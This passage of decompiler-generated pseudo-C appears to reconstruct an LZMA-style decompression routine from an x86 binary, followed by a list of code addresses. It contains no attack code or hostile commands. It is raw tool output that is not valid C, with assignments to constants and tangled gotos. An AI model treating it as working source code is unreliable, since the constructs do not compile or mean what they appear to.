                                                          											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                          											__eflags = _t258;
                                                          											0 | _t258 = _t258 + _t258 + 9;
                                                          											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                          											goto L75;
                                                          										case 0xa:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												__eax =  *(__ebp - 4);
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x84) = 0xb;
                                                          												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                          												while(1) {
                                                          													 *(_t613 - 0x54) = _t606;
                                                          													goto L133;
                                                          												}
                                                          											}
                                                          											__eax =  *(__ebp - 0x28);
                                                          											goto L88;
                                                          										case 0xb:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												__ecx =  *(__ebp - 0x24);
                                                          												__eax =  *(__ebp - 0x20);
                                                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          											} else {
                                                          												__eax =  *(__ebp - 0x24);
                                                          											}
                                                          											__ecx =  *(__ebp - 0x28);
                                                          											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          											L88:
                                                          											__ecx =  *(__ebp - 0x2c);
                                                          											 *(__ebp - 0x2c) = __eax;
                                                          											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          											L89:
                                                          											__eax =  *(__ebp - 4);
                                                          											 *(__ebp - 0x80) = 0x15;
                                                          											__eax =  *(__ebp - 4) + 0xa68;
                                                          											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                          											goto L69;
                                                          										case 0xc:
                                                          											L99:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												 *(__ebp - 0x88) = 0xc;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t334 = __ebp - 0x70;
                                                          											 *_t334 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t334;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											__eax =  *(__ebp - 0x2c);
                                                          											goto L101;
                                                          										case 0xd:
                                                          											L37:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												 *(__ebp - 0x88) = 0xd;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t122 = __ebp - 0x70;
                                                          											 *_t122 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t122;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											L39:
                                                          											__eax =  *(__ebp - 0x40);
                                                          											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                          												goto L48;
                                                          											}
                                                          											__eflags = __ebx - 0x100;
                                                          											if(__ebx >= 0x100) {
                                                          												goto L54;
                                                          											}
                                                          											L41:
                                                          											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                          											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                          											__ecx =  *(__ebp - 0x58);
                                                          											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                          											 *(__ebp - 0x48) = __eax;
                                                          											__eax = __eax + 1;
                                                          											__eax = __eax << 8;
                                                          											__eax = __eax + __ebx;
                                                          											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          											__ax =  *__esi;
                                                          											 *(__ebp - 0x54) = __esi;
                                                          											__edx = __ax & 0x0000ffff;
                                                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                          											__eflags =  *(__ebp - 0xc) - __ecx;
                                                          											if( *(__ebp - 0xc) >= __ecx) {
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          												__cx = __ax;
                                                          												 *(__ebp - 0x40) = 1;
                                                          												__cx = __ax >> 5;
                                                          												__eflags = __eax;
                                                          												__ebx = __ebx + __ebx + 1;
                                                          												 *__esi = __ax;
                                                          											} else {
                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                          												 *(__ebp - 0x10) = __ecx;
                                                          												0x800 = 0x800 - __edx;
                                                          												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                          												__ebx = __ebx + __ebx;
                                                          												 *__esi = __cx;
                                                          											}
                                                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          											 *(__ebp - 0x44) = __ebx;
                                                          											if( *(__ebp - 0x10) >= 0x1000000) {
                                                          												goto L39;
                                                          											} else {
                                                          												goto L37;
                                                          											}
                                                          										case 0xe:
                                                          											L46:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												 *(__ebp - 0x88) = 0xe;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t156 = __ebp - 0x70;
                                                          											 *_t156 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t156;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											while(1) {
                                                          												L48:
                                                          												__eflags = __ebx - 0x100;
                                                          												if(__ebx >= 0x100) {
                                                          													break;
                                                          												}
                                                          												__eax =  *(__ebp - 0x58);
                                                          												__edx = __ebx + __ebx;
                                                          												__ecx =  *(__ebp - 0x10);
                                                          												__esi = __edx + __eax;
                                                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          												__ax =  *__esi;
                                                          												 *(__ebp - 0x54) = __esi;
                                                          												__edi = __ax & 0x0000ffff;
                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          													__cx = __ax;
                                                          													_t170 = __edx + 1; // 0x1
                                                          													__ebx = _t170;
                                                          													__cx = __ax >> 5;
                                                          													__eflags = __eax;
                                                          													 *__esi = __ax;
                                                          												} else {
                                                          													 *(__ebp - 0x10) = __ecx;
                                                          													0x800 = 0x800 - __edi;
                                                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          													__ebx = __ebx + __ebx;
                                                          													 *__esi = __cx;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          												 *(__ebp - 0x44) = __ebx;
                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                          													continue;
                                                          												} else {
                                                          													goto L46;
                                                          												}
                                                          											}
                                                          											L54:
                                                          											_t173 = __ebp - 0x34;
                                                          											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                          											__eflags =  *_t173;
                                                          											goto L55;
                                                          										case 0xf:
                                                          											L58:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												 *(__ebp - 0x88) = 0xf;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t203 = __ebp - 0x70;
                                                          											 *_t203 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t203;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											L60:
                                                          											__eflags = __ebx - 0x100;
                                                          											if(__ebx >= 0x100) {
                                                          												L55:
                                                          												__al =  *(__ebp - 0x44);
                                                          												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                          												goto L56;
                                                          											}
                                                          											L61:
                                                          											__eax =  *(__ebp - 0x58);
                                                          											__edx = __ebx + __ebx;
                                                          											__ecx =  *(__ebp - 0x10);
                                                          											__esi = __edx + __eax;
                                                          											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          											__ax =  *__esi;
                                                          											 *(__ebp - 0x54) = __esi;
                                                          											__edi = __ax & 0x0000ffff;
                                                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          											__eflags =  *(__ebp - 0xc) - __ecx;
                                                          											if( *(__ebp - 0xc) >= __ecx) {
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          												__cx = __ax;
                                                          												_t217 = __edx + 1; // 0x1
                                                          												__ebx = _t217;
                                                          												__cx = __ax >> 5;
                                                          												__eflags = __eax;
                                                          												 *__esi = __ax;
                                                          											} else {
                                                          												 *(__ebp - 0x10) = __ecx;
                                                          												0x800 = 0x800 - __edi;
                                                          												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          												__ebx = __ebx + __ebx;
                                                          												 *__esi = __cx;
                                                          											}
                                                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          											 *(__ebp - 0x44) = __ebx;
                                                          											if( *(__ebp - 0x10) >= 0x1000000) {
                                                          												goto L60;
                                                          											} else {
                                                          												goto L58;
                                                          											}
                                                          										case 0x10:
                                                          											L109:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												 *(__ebp - 0x88) = 0x10;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t365 = __ebp - 0x70;
                                                          											 *_t365 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t365;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											goto L111;
                                                          										case 0x11:
                                                          											L69:
                                                          											__esi =  *(__ebp - 0x58);
                                                          											 *(__ebp - 0x84) = 0x12;
                                                          											while(1) {
                                                          												 *(_t613 - 0x54) = _t606;
                                                          												goto L133;
                                                          											}
                                                          										case 0x12:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												__eax =  *(__ebp - 0x58);
                                                          												 *(__ebp - 0x84) = 0x13;
                                                          												__esi =  *(__ebp - 0x58) + 2;
                                                          												while(1) {
                                                          													 *(_t613 - 0x54) = _t606;
                                                          													goto L133;
                                                          												}
                                                          											}
                                                          											__eax =  *(__ebp - 0x4c);
                                                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                          											__ecx =  *(__ebp - 0x58);
                                                          											__eax =  *(__ebp - 0x4c) << 4;
                                                          											__eflags = __eax;
                                                          											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                          											goto L130;
                                                          										case 0x13:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												_t469 = __ebp - 0x58;
                                                          												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                          												__eflags =  *_t469;
                                                          												 *(__ebp - 0x30) = 0x10;
                                                          												 *(__ebp - 0x40) = 8;
                                                          												L144:
                                                          												 *(__ebp - 0x7c) = 0x14;
                                                          												goto L145;
                                                          											}
                                                          											__eax =  *(__ebp - 0x4c);
                                                          											__ecx =  *(__ebp - 0x58);
                                                          											__eax =  *(__ebp - 0x4c) << 4;
                                                          											 *(__ebp - 0x30) = 8;
                                                          											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                          											L130:
                                                          											 *(__ebp - 0x58) = __eax;
                                                          											 *(__ebp - 0x40) = 3;
                                                          											goto L144;
                                                          										case 0x14:
                                                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                          											__eax =  *(__ebp - 0x80);
                                                          											 *(_t613 - 0x88) = _t533;
                                                          											goto L1;
                                                          										case 0x15:
                                                          											__eax = 0;
                                                          											__eflags =  *(__ebp - 0x38) - 7;
                                                          											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          											__al = __al & 0x000000fd;
                                                          											__eax = (__eflags >= 0) - 1 + 0xb;
                                                          											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                          											goto L120;
                                                          										case 0x16:
                                                          											__eax =  *(__ebp - 0x30);
                                                          											__eflags = __eax - 4;
                                                          											if(__eax >= 4) {
                                                          												_push(3);
                                                          												_pop(__eax);
                                                          											}
                                                          											__ecx =  *(__ebp - 4);
                                                          											 *(__ebp - 0x40) = 6;
                                                          											__eax = __eax << 7;
                                                          											 *(__ebp - 0x7c) = 0x19;
                                                          											 *(__ebp - 0x58) = __eax;
                                                          											goto L145;
                                                          										case 0x17:
                                                          											L145:
                                                          											__eax =  *(__ebp - 0x40);
                                                          											 *(__ebp - 0x50) = 1;
                                                          											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                          											goto L149;
                                                          										case 0x18:
                                                          											L146:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												 *(__ebp - 0x88) = 0x18;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t484 = __ebp - 0x70;
                                                          											 *_t484 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t484;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											L148:
                                                          											_t487 = __ebp - 0x48;
                                                          											 *_t487 =  *(__ebp - 0x48) - 1;
                                                          											__eflags =  *_t487;
                                                          											L149:
                                                          											__eflags =  *(__ebp - 0x48);
                                                          											if( *(__ebp - 0x48) <= 0) {
                                                          												__ecx =  *(__ebp - 0x40);
                                                          												__ebx =  *(__ebp - 0x50);
                                                          												0 = 1;
                                                          												__eax = 1 << __cl;
                                                          												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                          												__eax =  *(__ebp - 0x7c);
                                                          												 *(__ebp - 0x44) = __ebx;
                                                          												while(1) {
                                                          													 *(_t613 - 0x88) = _t533;
                                                          													goto L1;
                                                          												}
                                                          											}
                                                          											__eax =  *(__ebp - 0x50);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                          											__eax =  *(__ebp - 0x58);
                                                          											__esi = __edx + __eax;
                                                          											 *(__ebp - 0x54) = __esi;
                                                          											__ax =  *__esi;
                                                          											__edi = __ax & 0x0000ffff;
                                                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          											__eflags =  *(__ebp - 0xc) - __ecx;
                                                          											if( *(__ebp - 0xc) >= __ecx) {
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          												__cx = __ax;
                                                          												__cx = __ax >> 5;
                                                          												__eax = __eax - __ecx;
                                                          												__edx = __edx + 1;
                                                          												__eflags = __edx;
                                                          												 *__esi = __ax;
                                                          												 *(__ebp - 0x50) = __edx;
                                                          											} else {
                                                          												 *(__ebp - 0x10) = __ecx;
                                                          												0x800 = 0x800 - __edi;
                                                          												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                          												 *__esi = __cx;
                                                          											}
                                                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          											if( *(__ebp - 0x10) >= 0x1000000) {
                                                          												goto L148;
                                                          											} else {
                                                          												goto L146;
                                                          											}
                                                          										case 0x19:
                                                          											__eflags = __ebx - 4;
                                                          											if(__ebx < 4) {
                                                          												 *(__ebp - 0x2c) = __ebx;
                                                          												L119:
                                                          												_t393 = __ebp - 0x2c;
                                                          												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                          												__eflags =  *_t393;
                                                          												L120:
                                                          												__eax =  *(__ebp - 0x2c);
                                                          												__eflags = __eax;
                                                          												if(__eax == 0) {
                                                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                          													goto L170;
                                                          												}
                                                          												__eflags = __eax -  *(__ebp - 0x60);
                                                          												if(__eax >  *(__ebp - 0x60)) {
                                                          													goto L171;
                                                          												}
                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                          												__eax =  *(__ebp - 0x30);
                                                          												_t400 = __ebp - 0x60;
                                                          												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                          												__eflags =  *_t400;
                                                          												goto L123;
                                                          											}
                                                          											__ecx = __ebx;
                                                          											__eax = __ebx;
                                                          											__ecx = __ebx >> 1;
                                                          											__eax = __ebx & 0x00000001;
                                                          											__ecx = (__ebx >> 1) - 1;
                                                          											__al = __al | 0x00000002;
                                                          											__eax = (__ebx & 0x00000001) << __cl;
                                                          											__eflags = __ebx - 0xe;
                                                          											 *(__ebp - 0x2c) = __eax;
                                                          											if(__ebx >= 0xe) {
                                                          												__ebx = 0;
                                                          												 *(__ebp - 0x48) = __ecx;
                                                          												L102:
                                                          												__eflags =  *(__ebp - 0x48);
                                                          												if( *(__ebp - 0x48) <= 0) {
                                                          													__eax = __eax + __ebx;
                                                          													 *(__ebp - 0x40) = 4;
                                                          													 *(__ebp - 0x2c) = __eax;
                                                          													__eax =  *(__ebp - 4);
                                                          													__eax =  *(__ebp - 4) + 0x644;
                                                          													__eflags = __eax;
                                                          													L108:
                                                          													__ebx = 0;
                                                          													 *(__ebp - 0x58) = __eax;
                                                          													 *(__ebp - 0x50) = 1;
                                                          													 *(__ebp - 0x44) = 0;
                                                          													 *(__ebp - 0x48) = 0;
                                                          													L112:
                                                          													__eax =  *(__ebp - 0x40);
                                                          													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                          													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                          														_t391 = __ebp - 0x2c;
                                                          														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                          														__eflags =  *_t391;
                                                          														goto L119;
                                                          													}
                                                          													__eax =  *(__ebp - 0x50);
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                          													__eax =  *(__ebp - 0x58);
                                                          													__esi = __edi + __eax;
                                                          													 *(__ebp - 0x54) = __esi;
                                                          													__ax =  *__esi;
                                                          													__ecx = __ax & 0x0000ffff;
                                                          													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                          													__eflags =  *(__ebp - 0xc) - __edx;
                                                          													if( *(__ebp - 0xc) >= __edx) {
                                                          														__ecx = 0;
                                                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                          														__ecx = 1;
                                                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                          														__ebx = 1;
                                                          														__ecx =  *(__ebp - 0x48);
                                                          														__ebx = 1 << __cl;
                                                          														__ecx = 1 << __cl;
                                                          														__ebx =  *(__ebp - 0x44);
                                                          														__ebx =  *(__ebp - 0x44) | __ecx;
                                                          														__cx = __ax;
                                                          														__cx = __ax >> 5;
                                                          														__eax = __eax - __ecx;
                                                          														__edi = __edi + 1;
                                                          														__eflags = __edi;
                                                          														 *(__ebp - 0x44) = __ebx;
                                                          														 *__esi = __ax;
                                                          														 *(__ebp - 0x50) = __edi;
                                                          													} else {
                                                          														 *(__ebp - 0x10) = __edx;
                                                          														0x800 = 0x800 - __ecx;
                                                          														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                          														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                          														 *__esi = __dx;
                                                          													}
                                                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          													if( *(__ebp - 0x10) >= 0x1000000) {
                                                          														L111:
                                                          														_t368 = __ebp - 0x48;
                                                          														 *_t368 =  *(__ebp - 0x48) + 1;
                                                          														__eflags =  *_t368;
                                                          														goto L112;
                                                          													} else {
                                                          														goto L109;
                                                          													}
                                                          												}
                                                          												__ecx =  *(__ebp - 0xc);
                                                          												__ebx = __ebx + __ebx;
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                          												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                          												 *(__ebp - 0x44) = __ebx;
                                                          												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                          													__ecx =  *(__ebp - 0x10);
                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                          													__ebx = __ebx | 0x00000001;
                                                          													__eflags = __ebx;
                                                          													 *(__ebp - 0x44) = __ebx;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                          													L101:
                                                          													_t338 = __ebp - 0x48;
                                                          													 *_t338 =  *(__ebp - 0x48) - 1;
                                                          													__eflags =  *_t338;
                                                          													goto L102;
                                                          												} else {
                                                          													goto L99;
                                                          												}
                                                          											}
                                                          											__edx =  *(__ebp - 4);
                                                          											__eax = __eax - __ebx;
                                                          											 *(__ebp - 0x40) = __ecx;
                                                          											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                          											goto L108;
                                                          										case 0x1a:
                                                          											L56:
                                                          											__eflags =  *(__ebp - 0x64);
                                                          											if( *(__ebp - 0x64) == 0) {
                                                          												 *(__ebp - 0x88) = 0x1a;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x68);
                                                          											__al =  *(__ebp - 0x5c);
                                                          											__edx =  *(__ebp - 8);
                                                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                          											 *( *(__ebp - 0x68)) = __al;
                                                          											__ecx =  *(__ebp - 0x14);
                                                          											 *(__ecx +  *(__ebp - 8)) = __al;
                                                          											__eax = __ecx + 1;
                                                          											__edx = 0;
                                                          											_t192 = __eax %  *(__ebp - 0x74);
                                                          											__eax = __eax /  *(__ebp - 0x74);
                                                          											__edx = _t192;
                                                          											goto L79;
                                                          										case 0x1b:
                                                          											L75:
                                                          											__eflags =  *(__ebp - 0x64);
                                                          											if( *(__ebp - 0x64) == 0) {
                                                          												 *(__ebp - 0x88) = 0x1b;
                                                          												goto L170;
                                                          											}
                                                          											__eax =  *(__ebp - 0x14);
                                                          											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          											__eflags = __eax -  *(__ebp - 0x74);
                                                          											if(__eax >=  *(__ebp - 0x74)) {
                                                          												__eax = __eax +  *(__ebp - 0x74);
                                                          												__eflags = __eax;
                                                          											}
                                                          											__edx =  *(__ebp - 8);
                                                          											__cl =  *(__eax + __edx);
                                                          											__eax =  *(__ebp - 0x14);
                                                          											 *(__ebp - 0x5c) = __cl;
                                                          											 *(__eax + __edx) = __cl;
                                                          											__eax = __eax + 1;
                                                          											__edx = 0;
                                                          											_t274 = __eax %  *(__ebp - 0x74);
                                                          											__eax = __eax /  *(__ebp - 0x74);
                                                          											__edx = _t274;
                                                          											__eax =  *(__ebp - 0x68);
                                                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          											_t283 = __ebp - 0x64;
                                                          											 *_t283 =  *(__ebp - 0x64) - 1;
                                                          											__eflags =  *_t283;
                                                          											 *( *(__ebp - 0x68)) = __cl;
                                                          											L79:
                                                          											 *(__ebp - 0x14) = __edx;
                                                          											goto L80;
                                                          										case 0x1c:
                                                          											while(1) {
                                                          												L123:
                                                          												__eflags =  *(__ebp - 0x64);
                                                          												if( *(__ebp - 0x64) == 0) {
                                                          													break;
                                                          												}
                                                          												__eax =  *(__ebp - 0x14);
                                                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          												__eflags = __eax -  *(__ebp - 0x74);
                                                          												if(__eax >=  *(__ebp - 0x74)) {
                                                          													__eax = __eax +  *(__ebp - 0x74);
                                                          													__eflags = __eax;
                                                          												}
                                                          												__edx =  *(__ebp - 8);
                                                          												__cl =  *(__eax + __edx);
                                                          												__eax =  *(__ebp - 0x14);
                                                          												 *(__ebp - 0x5c) = __cl;
                                                          												 *(__eax + __edx) = __cl;
                                                          												__eax = __eax + 1;
                                                          												__edx = 0;
                                                          												_t414 = __eax %  *(__ebp - 0x74);
                                                          												__eax = __eax /  *(__ebp - 0x74);
                                                          												__edx = _t414;
                                                          												__eax =  *(__ebp - 0x68);
                                                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                          												__eflags =  *(__ebp - 0x30);
                                                          												 *( *(__ebp - 0x68)) = __cl;
                                                          												 *(__ebp - 0x14) = _t414;
                                                          												if( *(__ebp - 0x30) > 0) {
                                                          													continue;
                                                          												} else {
                                                          													L80:
                                                          													 *(__ebp - 0x88) = 2;
                                                          													goto L1;
                                                          												}
                                                          											}
                                                          											 *(__ebp - 0x88) = 0x1c;
                                                          											goto L170;
                                                          									}
                                                          								}
                                                          								L171:
                                                          								_t535 = _t534 | 0xffffffff;
                                                          								goto L172;
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          			}













                                                          0x00000000
                                                          0x00407068
                                                          0x00407068
                                                          0x0040706c
                                                          0x00407095
                                                          0x0040709f
                                                          0x0040706e
                                                          0x00407077
                                                          0x00407084
                                                          0x00407087
                                                          0x004073cb
                                                          0x004073cb
                                                          0x004073ce
                                                          0x004073ce
                                                          0x004073ce
                                                          0x004073d4
                                                          0x004073da
                                                          0x004073e0
                                                          0x004073fa
                                                          0x004073fd
                                                          0x00407403
                                                          0x0040740e
                                                          0x00407410
                                                          0x004073e2
                                                          0x004073e2
                                                          0x004073f1
                                                          0x004073f5
                                                          0x004073f5
                                                          0x0040741a
                                                          0x00000000
                                                          0x00000000
                                                          0x0040741c
                                                          0x00407420
                                                          0x004075cf
                                                          0x004075e5
                                                          0x004075ed
                                                          0x004075f4
                                                          0x004075f6
                                                          0x004075fd
                                                          0x00407601
                                                          0x00407601
                                                          0x0040742c
                                                          0x00407433
                                                          0x0040743b
                                                          0x0040743e
                                                          0x00407441
                                                          0x00407441
                                                          0x00407447
                                                          0x00407447
                                                          0x00406be3
                                                          0x00406be3
                                                          0x00406be3
                                                          0x00406bec
                                                          0x00000000
                                                          0x00000000
                                                          0x00406bf2
                                                          0x00000000
                                                          0x00406bfd
                                                          0x00000000
                                                          0x00000000
